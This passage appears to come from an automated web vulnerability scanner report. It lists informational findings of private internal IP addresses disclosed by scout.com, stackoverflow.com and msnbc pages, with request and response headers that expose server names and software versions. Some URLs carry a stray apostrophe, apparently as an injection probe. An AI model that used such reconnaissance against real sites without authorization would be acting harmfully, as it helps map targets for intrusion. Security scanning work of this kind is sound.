Content-Type: text/html
Content-Length: 29848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>High School Sports Front Page</title>
<meta http-equiv="Con
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.29. http://profootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profootball.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: profootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:16:11 GMT
ETag: "1CBC023A97B2780"
Content-Type: text/html
Content-Length: 41358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.30. http://recruiting.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:16 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:28:16 GMT
Last-Modified: Sun, 30 Jan 2011 02:15:18 GMT
ETag: "1CBC02389E3FF00"
Content-Type: text/html
Content-Length: 280509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.31. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET /a.z HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 29 Jan 2011 23:50:44 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:44 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.32. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.186
192.168.20.75

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:16 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 23 ms
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:28:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211505

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...

...[SNIP]...

27.33. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.186
192.168.20.77

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:08:40 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 25 ms
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 18:18:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211423

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...

...[SNIP]...

27.34. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.186
192.168.20.63

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:57:28 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 21 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:07:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211420

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...

...[SNIP]...

27.35. http://recruiting.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.92

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.36. http://rss.scout.com/rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rss.scout.com
Path:	/rss.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.181
192.168.20.63

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.37. http://rss.scout.com/rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rss.scout.com
Path:	/rss.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.20.186
192.168.20.72

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/html; charset=utf-8
Akamai: True
Cache-Control: private, max-age=891
Date: Sun, 30 Jan 2011 18:08:42 GMT
Connection: close
Connection: Transfer-Encoding
Akamai: True
Content-Length: 263784

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: RSS Feeds</title>
<meta http-equiv="Conte
...[SNIP]...

...[SNIP]...

27.38. http://scouthoops.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scouthoops.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

GET / HTTP/1.1
Host: scouthoops.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:37:08 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:47:08 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:20 GMT
ETag: "1CBC00F91011200"
Content-Type: text/html
Content-Length: 111693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.39. https://secure.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:50:53 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:00:53 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sc
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.40. https://secure.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.86

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:06 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
January 29, 2011 5:25:06 PM
URL: http://secure.scout.com:443/Legacy/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011
Server IP: 192.168.20.86, SECURE2
Page Execution Time: 119 ms
-->
...[SNIP]...

27.41. https://secure.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.87

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:59 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
te: Saturday, January 29, 2011 6:18:59 PM
URL: http://secure.scout.com:443/Legacy/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88
Server IP: 192.168.20.87, SECURE3
Page Execution Time: 101 ms
-->
...[SNIP]...

27.42. https://secure.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.85

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:20:16 GMT
Server: Microsoft-IIS/6.0
Server: Secure1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
January 30, 2011 9:20:16 AM
URL: http://secure.scout.com:443/Legacy/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011
Server IP: 192.168.20.85, SECURE1
Page Execution Time: 100 ms
-->
...[SNIP]...

27.43. http://stackoverflow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.1.2

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:12:26 GMT
Last-Modified: Sun, 30 Jan 2011 15:11:26 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:11:25 GMT
Content-Length: 194989

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Stack Overflow</title>

<link rel="stylesheet" type="text/css
...[SNIP]...
rther. because shows the error as Failed to retrieve the preconfiguration file ... ... The file needed for preconfiguration could not be retrieved from ... ... … ">cant access file from http://192.168.1.2:8774/preseed/preseed.conf in ubuntu cloud controller</a>
...[SNIP]...

27.44. http://stackoverflow.com/questions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.1.2

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:42 GMT
Content-Length: 51939

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Newest Questions - Stack Overflow</title>

<link rel="stylesh
...[SNIP]...
<a href="/questions/4843557/cant-access-file-from-http-192-168-1-28774-preseed-preseed-conf-in-ubuntu-clou" class="question-hyperlink">cant access file from http://192.168.1.2:8774/preseed/preseed.conf in ubuntu cloud controller</a>
...[SNIP]...

27.45. http://www.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.46. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/24780215/ns/technology_and_science-games

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/24780215/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.47. http://www.msnbc.redacted/id/3032072/ns/business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032072/ns/business

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032072/ns/business HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.48. http://www.msnbc.redacted/id/3032076/ns/health previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032076/ns/health

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032076/ns/health HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.49. http://www.msnbc.redacted/id/3032118/ns/technology_and_science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032118/ns/technology_and_science

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.50. http://www.msnbc.redacted/id/3032507/ns/world_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032507/ns/world_news

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032507/ns/world_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.51. http://www.msnbc.redacted/id/3032525/ns/us_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032525/ns/us_news

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032525/ns/us_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.52. http://www.msnbc.redacted/id/3032553/ns/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032553/ns/politics

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3032553/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.53. http://www.msnbc.redacted/id/3053415/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3053415/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/3053415/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.54. http://www.msnbc.redacted/id/8004316/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/8004316/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.7.224.218

Request

GET /id/8004316/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.55. http://www.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.10.106
192.168.20.210

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:25:49 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:35:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:54:38 GMT
ETag: "1CBC00FE3423300"
Content-Type: text/html
Content-Length: 99726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...

...[SNIP]...

...[SNIP]...

27.56. http://www.scout.com/3/college-links.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/college-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.57

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...

...[SNIP]...

27.57. http://www.scout.com/3/college-links.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/college-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.88

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12625

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...

...[SNIP]...

27.58. http://www.scout.com/3/company.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/company.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.56

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:37 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14471

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...

...[SNIP]...

27.59. http://www.scout.com/3/company.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/company.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.88

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14472

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...

...[SNIP]...

27.60. http://www.scout.com/3/fair-use.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/fair-use.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.88

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13618

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...

...[SNIP]...

27.61. http://www.scout.com/3/fair-use.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/fair-use.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.56

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:35 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13617

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...

...[SNIP]...

27.62. http://www.scout.com/3/jobs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/jobs.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.20.57

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:51 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18927

<!DOCTYPE html
